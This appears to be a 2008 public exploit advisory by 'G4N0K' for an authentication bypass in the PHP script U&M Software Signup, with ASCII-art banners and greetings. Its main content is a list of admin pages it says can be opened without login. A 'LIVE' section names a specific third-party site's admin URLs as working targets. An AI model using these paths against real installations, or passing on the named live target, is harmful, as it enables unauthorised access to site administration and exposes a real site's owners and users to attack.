============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== ____ _ _ _ _ ___ _ __ / ___| | || | | \ | | / _ \ | |/ / | | _ | || |_ | \| | | | | | | ' / | |_| | |__ _| | |\ | | |_| | | . \ \____| |_| |_| \_| \___/ |_|\_\ ============================================================================== U&M Software Signup v1.1 Auth Bypass Vulnerability ============================================================================== [»] Script: [ U&M Software Signup v1.0 ] [»] Language: [ PHP ] [»] Website: [ http://www.hotscripts.com/Detailed/65722.html ] [»] Type: [ Commercial ] [»] Report-Date: [ 06.11.2008 ] [»] Founder: [ G4N0K ] ===[ XPL ]=== [!] Use one of these paths to bypass admin login ;) [»] http://localhost/[path]/admin/adminstart.php [»] http://localhost/[path]/admin/admineventtype.php [»] http://localhost/[path]/admin/admineventdetails.php [»] http://localhost/[path]/admin/admineventlist.php [»] http://localhost/[path]/admin/adminuserslist.php [»] http://localhost/[path]/admin/adminleaderslist.php [»] http://localhost/[path]/admin/admindatabase.php ===[ LIVE ]=== [»] http://www.signup.uochm.com/software/admin/index.php [»] http://www.signup.uochm.com/software/admin/adminstart.php ===[ Greetz ]=== [»] ALLAH [»] Tornado2800 [»] Hussain-X //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) //ALLAH,forgimme... =============================================================================== exit(); //EoX ===============================================================================